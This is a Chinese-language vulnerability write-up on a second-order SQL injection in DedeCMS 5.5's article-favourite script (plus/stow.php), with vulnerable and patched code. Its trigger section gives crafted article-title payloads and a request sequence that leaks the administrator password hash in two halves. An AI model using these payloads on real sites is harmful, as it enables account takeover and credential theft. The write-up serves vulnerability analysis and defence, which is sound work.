catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
收藏文章功能$title变量未过滤,造成二次注入
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2013-046375
2. 漏洞触发条件
0x1: 发布一个特殊构造标题的文章
http://127.0.0.1/dedecms5.5/member/content_list.php?channelid=1 //文章标题如下,目的是额外注入了一条可以查询出管理员密码的SQL语句 u',char(@`'`), (select pwd from dede_admin))#
0x2: 提交收藏请求
获取刚才发布文章的aid。例如aid=108,针对这篇文章发起收藏请求 http://localhost/dedecms5.5/plus/stow.php?aid=108&type=001
0x3: 发起刚才发布的文章的"推荐"请求
http://localhost/dedecms5.5/member/mystow.php //点击刚才发布的文章的"推荐"链接,打开如下连接 http://localhost/dedecms5.5/plus/recommend.php?type=29a53fb3c3&aid=108 //其中type=29a53fb3c3的"29a53fb3c3"为向dede_admin.pwd字段的前10位,这个时候二次注入就已经发生了
0x4: 注入后10位
后10位使用类似的步骤,不同的是发布的文章标题为 u',char(@`'`),substring((select pwd from dede_admin),11))#
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2013-046375
3. 漏洞影响范围
4. 漏洞代码分析
/plus/stow.php
.. $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' "); if(!is_array($row)) { //这里的TITLE是从数据库里查询出来的,也就是我们发布的文章的标题 $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".$title."','$addtime'); "); } ..
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2014-048913
5. 防御方法
/plus/stow.php
<?php require_once(dirname(__FILE__)."/../include/common.inc.php"); $aid = ( isset($aid) && is_numeric($aid) ) ? $aid : 0; $type=empty($type)? "" : HtmlReplace($type,1); if($aid==0) { ShowMsg('文档id不能为空!','javascript:window.close();'); exit(); } require_once(DEDEINC."/memberlogin.class.php"); $ml = new MemberLogin(); if($ml->M_ID==0) { ShowMsg('只有会员才允许收藏操作!','javascript:window.close();'); exit(); } //读取文档信息 $arcRow = GetOneArchive($aid); if($arcRow['aid']=='') { ShowMsg("无法收藏未知文档!","javascript:window.close();"); exit(); } extract($arcRow, EXTR_SKIP); /**/ $title = HtmlReplace($title,1); $aid = intval($aid); /**/ $addtime = time(); if($type==''){ $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' AND type='' "); if(!is_array($row)) { $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes($arctitle)."','$addtime'); "); } }else{ $row = $dsql->GetOne("Select * From `#@__member_stow` where type='$type' and (aid='$aid' And mid='{$ml->M_ID}')"); if(!is_array($row)){ $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime,type) VALUES ('".$ml->M_ID."','$aid','$title','$addtime','$type'); "); } } //更新用户统计 $row = $dsql->GetOne("SELECT COUNT(*) AS nums FROM `#@__member_stow` WHERE `mid`='{$ml->M_ID}' "); $dsql->ExecuteNoneQuery("UPDATE #@__member_tj SET `stow`='$row[nums]' WHERE `mid`='".$ml->M_ID."'"); ShowMsg('成功收藏一篇文档!','javascript:window.close();'); ?>
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved